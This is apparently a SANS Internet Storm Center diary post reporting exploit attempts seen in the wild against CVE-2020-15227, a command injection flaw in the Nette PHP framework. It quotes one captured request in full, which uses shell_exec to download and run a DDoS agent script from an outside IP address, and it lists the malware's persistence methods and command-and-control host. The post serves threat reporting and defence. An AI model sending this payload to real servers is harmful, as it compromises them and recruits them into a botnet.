Loading...

Attacks against the “Nette” PHP framework CVE-2020-15227, (Fri, Jul 12th)

Today, I noticed some exploit attempts against an older vulnerability in the “Nette Framework”, CVE-2020-15227 [1].

Nette is a PHP framework that simplifies the development of web applications in PHP. In 2020, an OS command injection vulnerability was found and patched in Nette. As so often with OS command injection, exploitation was rather straightforward. An exploit was released soon after.

Today, I noticed yet another variation of an exploit vor CVE-2020-15227:

 /nette.micro/?callback=shell_exec&cmd=cd%20/tmp;wget%20http://199.204.98.254/ohshit.sh;chmod%20777%20ohshit.sh;./ohshit.sh

Even though the exploit is old, and the line above loads a simple DDoS agent, the agent itself has not been uploaded to Virustotal yet [2]. 

The malware was written in Go, and Virustotal’s “Behaviour” analysis does a pretty good job in summarizing the binary.

The binary uses crontab and systemd for persistence.
it uses sosbot.icu on port 1314 for command and control
 

[1] https://github.com/nette/application/security/advisories/GHSA-8gv3-3j7f-wg94
[2] https://www.virustotal.com/gui/file/8325bfc699f899d0190e36ea339540ea0590aea0e1b22b8a2dcec3ff8b5763b8


Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

Your email address will not be published. Required fields are marked *